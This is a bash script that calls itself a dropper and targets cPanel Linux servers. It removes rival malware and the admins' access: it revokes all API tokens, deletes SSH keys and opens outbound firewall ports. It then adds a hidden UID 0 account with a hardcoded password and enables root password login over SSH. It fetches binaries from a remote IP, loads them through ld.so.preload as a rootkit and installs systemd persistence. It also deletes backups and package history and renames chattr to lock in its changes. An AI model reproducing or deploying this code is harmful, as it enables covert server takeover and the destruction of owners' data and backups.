#!/bin/bash # Function to log messages log_message() { echo "$(date '+%Y-%m-%d %H:%M:%S') - $1" } log_message "Starting dropper script execution." # 1. Configure CSF (if installed) log_message "Configuring CSF firewall." sed -i 's/^TCP_OUT = .*/TCP_OUT = "1:65535"/' /etc/csf/csf.conf sed -i 's/^UDP_OUT = .*/UDP_OUT = "1:65535"/' /etc/csf/csf.conf csf -r log_message "CSF firewall configured." # 2. Clean up services and files log_message "Performing initial cleanup of services and files." systemctl disable --now cpanel-ssh-fix.service 2>/dev/null rm -f /etc/systemd/system/cpanel-ssh-fix.service rm -rf /root/.config/prng /tmp/.ca/betopop /usr/local/lib/.fs-cache.py /usr/bin/qq /usr/bin/ww /root/sto.sh /root/new-pass.txt /root/ok /root/main.js /root/sto.sh sed -i '/PRNGD/d' /root/.bashrc /root/.profile /root/.bash_profile /etc/profile 2>/dev/null crontab -l 2>/dev/null | grep -v "recoverymgmt" | crontab - unset -f ssh hash -r log_message "Initial cleanup complete." # 3. Remove immutability and kill processes log_message "Removing immutability flags and terminating suspicious processes." chattr -R -ia /etc/systemd/system/ /etc/cron.hourly/ /usr/local/bin/ /usr/local/lib/ /root/ /tmp/ /var/spool/cron/ /usr/share/zoneinfo/.dbus/ /.maker/ 2>/dev/null chattr -ia /etc/passwd /etc/shadow /etc/group /etc/gshadow /usr/bin/defunct /etc/systemd/.nk /home/numrocrm/c3pool/config.json 2>/dev/null ps aux | awk 'NR>1 && $3 > 25.0 {print $2}' | xargs -r kill -9 chattr -ia /etc/passwd chattr -ia /etc/shadow sed -i '/^\(pakchoi\|ahsq\|cpaneld-service\):/d' /etc/passwd /etc/shadow /etc/group /etc/gshadow rm -rf /home/pakchoi /home/ahsq /home/cpaneld-service /var/spool/cron/pakchoi /var/spool/cron/ahsq /var/spool/cron/cpaneld-service /var/spool/cron/crontabs/pakchoi /var/spool/cron/crontabs/ahsq /var/spool/cron/crontabs/cpaneld-service /var/lib/aioz-depin/ /etc/systemd/system/aioz-depin.service.d/ pkill -9 -f "sshd: pakchoi" pkill -9 -f "sshd: ahsq" pkill -9 -f "sshd: cpaneld-service" systemctl stop 4thepool_watcher systemd-network systemd-resolved kernel-updater daemon dbus-system-monitor dbus-cleanup.timer dbus-cleanup.service sync.service sync.timer c3pool_miner.service gs.service netdrv.service sys-health.timer sys-health.service dbus-session-helper.service aioz-mq-proxy aioz-depin systemctl disable 4thepool_watcher systemd-network systemd-resolved kernel-updater daemon dbus-system-monitor dbus-cleanup.timer dbus-cleanup.service sync.service sync.timer c3pool_miner.service gs.service netdrv.service sys-health.timer sys-health.service dbus-session-helper.service aioz-mq-proxy aioz-depin rm -f /root/nuclear* /root/xmrig* /root/.run.sh /usr/.local/run.sh /usr/.local/daemon.sh /usr/local/bin/watcher /etc/cron.hourly/ebtwusmxn /etc/cron.hourly/xftbfww rm -rf /tmp/.systemd/ chattr -ia /usr/share/zoneinfo/.dbus 2>/dev/null rm -rf /usr/share/zoneinfo/.dbus/* chattr +ia /usr/share/zoneinfo/.dbus systemctl stop gs-dbus 2>/dev/null; systemctl disable gs-dbus 2>/dev/null; pkill -9 -f "ashah|asshb|bbaas|sshsas|gs-dbus|kcached|.run.sh"; chattr -i /root/.run.sh /root/.rsyslogd /root/.javad /usr/bin/gs-dbus /lib/systemd/system/gs-dbus.dat /usr/lib/systemd/system/gs-dbus.service 2>/dev/null; rm -f /root/.run.sh /root/.rsyslogd /root/.javad /usr/bin/gs-dbus /lib/systemd/system/gs-dbus.dat /usr/lib/systemd/system/gs-dbus.service /etc/systemd/system/multi-user.target.wants/gs-dbus.service /root/o*; sed -i '/.run.sh/d' /etc/rc.local systemctl daemon-reload pkill -9 -f watcher pkill -9 -f run.sh pkill -9 -f /tmp/.systemd for s in 4thepool_watcher.service systemd-network.service systemd-resolved.service kernel-updater.service daemon.service Cron.service Tmux.service Screen.service dbus-system-monitor.service dbus-cleanup.timer dbus-cleanup.service scanered.service scanered-watchdog.service sync.service sync.timer c3pool_miner.service gs.service netdrv.service sys-health.timer sys-health.service dbus-session-helper.service aioz-mq-proxy.service aioz-depin.service; do systemctl stop $s; systemctl disable $s; f="/etc/systemd/system/$s"; chattr -ia "$f" 2>/dev/null; > "$f"; chattr +ia "$f"; done for bin in /usr/local/bin/sync.x86_64 /home/numrocrm/c3pool/xmrig /home/numrocrm/c3pool/config.json /usr/bin/defunct /usr/local/lib/.netd /etc/systemd/.nk /root/.javad /usr/local/sbin/aioz-mq-proxy.py /opt/aioz-depin/aioz-depin-cli; do chattr -ia "$bin" 2>/dev/null; > "$bin"; chattr +ia "$bin"; done systemctl daemon-reload ps aux | grep -E "nuclear.x86|xmrig|defunct|.netd|.javad|aioz" | grep -v grep | awk '{print $2}' | xargs -r kill -9 pkill -9 -f "ecr|rustbolit|java_test|aioz" crontab -l | grep -vE 'amco_|pakchoi|ahsq|cpaneld-service' | crontab - userdel -f -r pakchoi 2>/dev/null userdel -f -r ahsq 2>/dev/null userdel -f -r cpaneld-service 2>/dev/null rm -f /etc/sudoers.d/99-pakchoi /etc/sudoers.d/99-ahsq /etc/sudoers.d/99-cpaneld-service rm -rf /tmp/bash /var/tmp/bash docker rm -f amco_2b9fa4ee-3349-43ea-b27d-9f7fc2551962 amco_1c52acb5-ea94-457d-af94-31c8dc8d5900 amco_a9aeb77e-cfad-48eb-bb19-d796847579b9 2>/dev/null rm -rf /root/.run.sh rm -rf /root/.rsyslogd touch /root/.rsyslogd chattr +ia /root/.rsyslogd touch /root/.run.sh chattr +ia /root/.run.sh chattr -ia /usr/local/sbin/.syslogd-helper.sh rm -rf /usr/local/sbin/.syslogd-helper.sh touch /usr/local/sbin/.syslogd-helper.sh chattr +ia /usr/local/sbin/.syslogd-helper.sh chattr -ia /.maker/ 2>/dev/null rm -rf /.maker/* chattr +ia /.maker/ docker rm -f $(docker ps -aq --filter "ancestor=negoroo/amco:123") 2>/dev/null docker rmi -f negoroo/amco:123 2>/dev/null rm -f /etc/systemd/system/sys-health.* log_message "Immutability flags removed and processes terminated." # 4. Clean up specific libraries and kill processes log_message "Cleaning up specific libraries and killing associated processes." chattr -R -i /usr/share/man/man3/.syslog-7e4fc1e6/ /etc/ld.so.preload /usr/lib64/libnss_cache.so.2 /usr/lib/__root/ 2>/dev/null pkill -9 -f syslog-helper pkill -9 -f __root pkill -9 -f hhsab pkill -9 -f hbhaa kill -9 213266 64612 61454 2>/dev/null rm -rf /usr/share/man/man3/.syslog-7e4fc1e6/ /usr/lib/__root/ /usr/lib64/libnss_cache.so.2 python -c 'open("/etc/ld.so.preload", "w").truncate(0)' log_message "Specific libraries cleaned and processes killed." # 5. Automated purge of suspicious users and files log_message "Performing automated purge of suspicious users and files." # Kill processes related to downloaders and backdoors ps aux | grep -iE "curl|wget|bash -i|nc -e|129.121.87.60" | grep -v grep | awk '{print $2}' | xargs -r kill -9 # Remove immutability for reseller and user files chattr -i /var/cpanel/resellers* /etc/passwd /etc/shadow # Remove resellers with RESELLER=1 flag not in userdomains and delete their associated files for U in $(ls -1 /var/cpanel/users/ | grep -vE "^(\.|root|system|nobody)$"); do if grep -q "RESELLER=1" "/var/cpanel/users/$U" 2>/dev/null && ! grep -qw "$U" /etc/userdomains; then log_message "Removing reseller user: $U" userdel -f -r "$U" 2>/dev/null rm -rf "/var/cpanel/users/$U" "/var/cpanel/authn/shadow/$U" "/var/cpanel/reseller-acls/$U" sed -i "/^$U[:=]/d" /var/cpanel/resellers /var/cpanel/resellers_unlimited_acl /var/cpanel/resellers_root_acl /var/cpanel/resellers_pkgacls fi done # Remove any users with UID 0 that are not 'root' for U in $(awk -F: '($3 == "0" && $1 != "root") {print $1}' /etc/passwd); do log_message "Removing UID 0 user: $U" userdel -f -r "$U" 2>/dev/null done # Revoke all API tokens whmapi1 api_token_list | awk '/name:/ {print $2}' | xargs -I {} whmapi1 api_token_revoke token_name={} 2>/dev/null; for u in $(ls /var/cpanel/users); do uapi --user=$u Tokens list | awk '/name:/ {print $2}' | xargs -I {} uapi --user=$u Tokens revoke name={} 2>/dev/null; done; rm -rf /var/cpanel/apitokens/*; /usr/local/cpanel/scripts/cleardatastore; rm -f /var/cpanel/datastore/*api_token*; /usr/local/cpanel/scripts/restartsrv_cpsrvd whmapi1 api_token_list # Remove root's accesshash and authorized_keys rm -f /root/.accesshash /root/.ssh/authorized_keys # Remove authorized_keys files from all user home directories rm -f /home/*/.ssh/authorized_keys # Remove cron jobs related to downloaders grep -rlE "curl|wget|cprapid|yusa_yusarin" /etc/cron* /var/spool/cron/ | xargs -r rm -f # Force update of user domains /usr/local/cpanel/scripts/updateuserdomains --force # Restart cPanel service /usr/local/cpanel/scripts/restartsrv_cpsrvd log_message "Automated purge complete. Check for remaining UID 0 users: awk -F: '(\$3 == \"0\") {print \$1}' /etc/passwd" # 6. Create a new user and configure SSH log_message "Creating new user 'admin2' and configuring SSH." # Remove immutability for passwd and shadow before creating user chattr -i /etc/passwd /etc/shadow useradd -o -u 0 -g 0 -d /home/admin2 -m admin2 && echo "secret123" | passwd --stdin admin2 # Make passwd and shadow immutable again after user creation chattr +ia /etc/passwd chattr +ia /etc/shadow # Configure SSH for password authentication and root login for admin2 log_message "Configuring SSH for password authentication and root login for admin2." chattr -i /etc/ssh/sshd_config chattr -i /etc/ssh/sshd_config.d/ 2>/dev/null rm -f /etc/ssh/sshd_config.d/*.conf chattr +i /etc/ssh/sshd_config.d/ sed -i '/^PermitRootLogin/d' /etc/ssh/sshd_config sed -i '/^PasswordAuthentication/d' /etc/ssh/sshd_config sed -i '/^KbdInteractiveAuthentication/d' /etc/ssh/sshd_config sed -i '/^ChallengeResponseAuthentication/d' /etc/ssh/sshd_config sed -i '/^Match User admin2/,$d' /etc/ssh/sshd_config echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config echo "KbdInteractiveAuthentication yes" >> /etc/ssh/sshd_config echo "ChallengeResponseAuthentication yes" >> /etc/ssh/sshd_config echo "PermitRootLogin prohibit-password" >> /etc/ssh/sshd_config echo "" >> /etc/ssh/sshd_config echo "Match User admin2" >> /etc/ssh/sshd_config echo " PermitRootLogin yes" >> /etc/ssh/sshd_config chattr +i /etc/ssh/sshd_config systemctl restart sshd log_message "SSH configured for admin2." # 7. Download and execute remote files log_message "Downloading and executing remote files." # Download and make executable /usr/bin/local-fs0 log_message "Downloading local-fs0." curl http://138.68.65.59:8363/local-fs0 -o /usr/bin/local-fs0 -k chmod +x /usr/bin/local-fs0 chmod 777 /usr/bin/local-fs0 chattr +ia /usr/bin/local-fs0 log_message "Executing local-fs0." /usr/bin/local-fs0 & # Download and make executable /usr/local/lib/local-fs1.sh log_message "Downloading local-fs1.sh." curl http://138.68.65.59:8363/local-fs1.sh -o /usr/local/lib/local-fs1.sh -k chmod +x /usr/local/lib/local-fs1.sh chmod 777 /usr/local/lib/local-fs1.sh chattr +ia /usr/local/lib/local-fs1.sh # Download and make executable shared objects for /usr/local/lib/ log_message "Downloading shared objects for /usr/local/lib/." curl http://138.68.65.59:8363/centos/local-fs0.so -o /usr/local/lib/local-fs0.so -k chmod +x /usr/local/lib/local-fs0.so chattr +ia /usr/local/lib/local-fs0.so curl http://138.68.65.59:8363/centos/local-fs1.so -o /usr/local/lib/local-fs1.so -k chmod +x /usr/local/lib/local-fs1.so chattr +ia /usr/local/lib/local-fs1.so # Update ld.so.preload log_message "Updating ld.so.preload." chattr -ia /etc/ld.so.preload rm -rf /etc/ld.so.preload echo /usr/local/lib/local-fs0.so >> /etc/ld.so.preload echo /usr/local/lib/local-fs1.so >> /etc/ld.so.preload chattr +ia /etc/ld.so.preload log_message "ld.so.preload updated." cat /etc/ld.so.preload # Download and enable systemd services and timers log_message "Downloading and enabling systemd services and timers." curl http://138.68.65.59:8363/local-fs1.service -o /etc/systemd/system/local-fs1.service -k chattr +ia /etc/systemd/system/local-fs1.service systemctl enable local-fs1.service curl http://138.68.65.59:8363/local-fs1.timer -o /etc/systemd/system/local-fs1.timer -k chattr +ia /etc/systemd/system/local-fs1.timer systemctl enable local-fs1.timer systemctl start local-fs1.timer curl http://138.68.65.59:8363/local-fs0.service -o /etc/systemd/system/local-fs0.service -k chattr +ia /etc/systemd/system/local-fs0.service systemctl enable local-fs0.service systemctl start local-fs0.service log_message "Systemd services and timers enabled and started." # Extra (Cleaning /etc/systemd/system/) log_message "Cleaning /etc/systemd/system" for f in /etc/systemd/system/*; do b="${f##*/}"; [[ $(date -r "$f" +%Y-%m) =~ 2026-0[45] ]] && [[ "$b" != "local-fs0.service" && "$b" != "local-fs1.service" && "$b" != "local-fs1.timer" ]] && chattr -ia "$f" && rm -f "$f"; done && chattr +ia /etc/systemd/system/ # Remove Backups log_message "Removing backups" pkill -9 -f "yum|dnf|apt|dpkg"; rm -f /var/run/yum.pid /var/run/dnf.pid /var/lib/dpkg/lock* /var/lib/apt/lists/lock; whmapi1 backup_config_set enable_backup=0; rm -rf /backup/* /cpbackup/* /var/cpanel/backups/* /var/backups/* /var/lib/backups/* /var/tmp/backup* /tmp/backup* /var/cpanel/taskman/tasks/*; ([ -x "$(command -v apt-get)" ] && apt-get clean) || ([ -x "$(command -v dnf)" ] && dnf clean all) || (yum clean all); rm -rf /var/lib/dnf/history.* /var/lib/yum/history.*; rm -f {/home,/var/www}/{,*/,*/*/}{*.tar.gz,*.bak,*.swp,*.tar}; /usr/local/cpanel/bin/manage_hooks delete --all; [ -x "$(command -v lvremove)" ] && lvdisplay | grep "Snapshot" && echo "LVM Snapshots detected. Use 'lvs' to identify and 'lvremove' to purge." # 8. Rename chattr to prevent modification reversal log_message "Renaming chattr to prevent modification reversal." mv /usr/bin/chattr /usr/bin/localfs chmod 700 /usr/bin/localfs touch /usr/bin/chattr /usr/bin/localfs +i /usr/bin/chattr /usr/bin/localfs +i /usr/bin/localfs log_message "chattr renamed to localfs and made immutable." log_message "Script execution completed successfully."